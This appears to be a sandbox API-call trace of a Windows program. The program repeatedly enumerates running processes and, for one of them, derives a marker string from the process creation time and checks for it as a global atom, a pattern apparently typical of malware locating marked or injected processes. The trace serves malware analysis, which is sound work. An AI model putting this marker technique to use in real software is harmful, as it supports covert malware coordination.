	[0103.245] CloseHandle (hObject=0x690) returned 1
	[0103.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.245] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.245] CloseHandle (hObject=0x690) returned 1
	[0103.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.245] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.245] CloseHandle (hObject=0x690) returned 1
	[0103.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.245] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.245] CloseHandle (hObject=0x690) returned 1
	[0103.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.245] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.245] CloseHandle (hObject=0x690) returned 1
	[0103.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.246] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.246] CloseHandle (hObject=0x690) returned 1
	[0103.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.246] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.246] CloseHandle (hObject=0x690) returned 1
	[0103.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.246] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.246] CloseHandle (hObject=0x690) returned 1
	[0103.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.246] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.246] CloseHandle (hObject=0x690) returned 1
	[0103.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.246] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.246] CloseHandle (hObject=0x690) returned 1
	[0103.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.248] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.248] CloseHandle (hObject=0x690) returned 1
	[0103.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.248] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.248] CloseHandle (hObject=0x690) returned 1
	[0103.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.248] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.248] CloseHandle (hObject=0x690) returned 1
	[0103.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.248] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.248] CloseHandle (hObject=0x690) returned 1
	[0103.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.249] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.249] CloseHandle (hObject=0x690) returned 1
	[0103.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.249] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.250] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.250] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.250] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.250] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.250] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.250] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.251] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.251] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.251] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.251] CloseHandle (hObject=0x690) returned 1
	[0103.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.251] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.251] CloseHandle (hObject=0x690) returned 1
	[0103.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.251] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.251] CloseHandle (hObject=0x690) returned 1
	[0103.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.287] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.287] CloseHandle (hObject=0x690) returned 1
	[0103.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.287] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.288] CloseHandle (hObject=0x690) returned 1
	[0103.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.288] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.288] CloseHandle (hObject=0x690) returned 1
	[0103.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.288] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.288] CloseHandle (hObject=0x690) returned 1
	[0103.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.288] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.288] CloseHandle (hObject=0x690) returned 1
	[0103.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.288] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.288] CloseHandle (hObject=0x690) returned 1
	[0103.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.289] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.289] CloseHandle (hObject=0x690) returned 1
	[0103.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.289] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.289] CloseHandle (hObject=0x690) returned 1
	[0103.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.289] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.289] CloseHandle (hObject=0x690) returned 1
	[0103.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.289] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.290] CloseHandle (hObject=0x690) returned 1
	[0103.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.290] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.290] CloseHandle (hObject=0x690) returned 1
	[0103.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.290] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.290] CloseHandle (hObject=0x690) returned 1
	[0103.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.290] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.290] CloseHandle (hObject=0x690) returned 1
	[0103.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.290] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.290] CloseHandle (hObject=0x690) returned 1
	[0103.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.291] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.291] CloseHandle (hObject=0x690) returned 1
	[0103.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.291] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.291] CloseHandle (hObject=0x690) returned 1
	[0103.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.291] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.291] CloseHandle (hObject=0x690) returned 1
	[0103.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.291] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.291] CloseHandle (hObject=0x690) returned 1
	[0103.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.291] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.291] CloseHandle (hObject=0x690) returned 1
	[0103.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.292] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.292] CloseHandle (hObject=0x690) returned 1
	[0103.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.292] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.292] CloseHandle (hObject=0x690) returned 1
	[0103.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.292] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.292] CloseHandle (hObject=0x690) returned 1
	[0103.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.292] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.292] CloseHandle (hObject=0x690) returned 1
	[0103.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.292] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.292] CloseHandle (hObject=0x690) returned 1
	[0103.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.293] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.293] CloseHandle (hObject=0x690) returned 1
	[0103.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.293] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.293] CloseHandle (hObject=0x690) returned 1
	[0103.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.293] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.293] CloseHandle (hObject=0x690) returned 1
	[0103.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.293] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.293] CloseHandle (hObject=0x690) returned 1
	[0103.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.293] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.293] CloseHandle (hObject=0x690) returned 1
	[0103.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.294] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.294] CloseHandle (hObject=0x690) returned 1
	[0103.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.294] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.294] CloseHandle (hObject=0x690) returned 1
	[0103.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.295] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.297] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.297] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.297] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.297] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.298] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.298] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.298] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.298] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.298] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.298] CloseHandle (hObject=0x690) returned 1
	[0103.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.298] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.298] CloseHandle (hObject=0x690) returned 1
	[0103.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.299] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.299] CloseHandle (hObject=0x690) returned 1
	[0103.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.335] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.335] CloseHandle (hObject=0x690) returned 1
	[0103.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.335] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.335] CloseHandle (hObject=0x690) returned 1
	[0103.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.336] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.336] CloseHandle (hObject=0x690) returned 1
	[0103.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.336] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.336] CloseHandle (hObject=0x690) returned 1
	[0103.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.336] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.336] CloseHandle (hObject=0x690) returned 1
	[0103.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.336] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.336] CloseHandle (hObject=0x690) returned 1
	[0103.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.336] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.336] CloseHandle (hObject=0x690) returned 1
	[0103.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.337] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.337] CloseHandle (hObject=0x690) returned 1
	[0103.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.337] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.337] CloseHandle (hObject=0x690) returned 1
	[0103.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.337] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.337] CloseHandle (hObject=0x690) returned 1
	[0103.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.337] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.337] CloseHandle (hObject=0x690) returned 1
	[0103.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.337] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.338] CloseHandle (hObject=0x690) returned 1
	[0103.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.338] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.338] CloseHandle (hObject=0x690) returned 1
	[0103.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.338] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.338] CloseHandle (hObject=0x690) returned 1
	[0103.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.338] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.338] CloseHandle (hObject=0x690) returned 1
	[0103.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.338] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.338] CloseHandle (hObject=0x690) returned 1
	[0103.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.338] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.339] CloseHandle (hObject=0x690) returned 1
	[0103.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.339] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.339] CloseHandle (hObject=0x690) returned 1
	[0103.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.339] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.339] CloseHandle (hObject=0x690) returned 1
	[0103.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.339] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.339] CloseHandle (hObject=0x690) returned 1
	[0103.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.339] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.339] CloseHandle (hObject=0x690) returned 1
	[0103.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.339] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.339] CloseHandle (hObject=0x690) returned 1
	[0103.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.340] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.340] CloseHandle (hObject=0x690) returned 1
	[0103.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.340] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.340] CloseHandle (hObject=0x690) returned 1
	[0103.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.340] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.340] CloseHandle (hObject=0x690) returned 1
	[0103.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.340] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.340] CloseHandle (hObject=0x690) returned 1
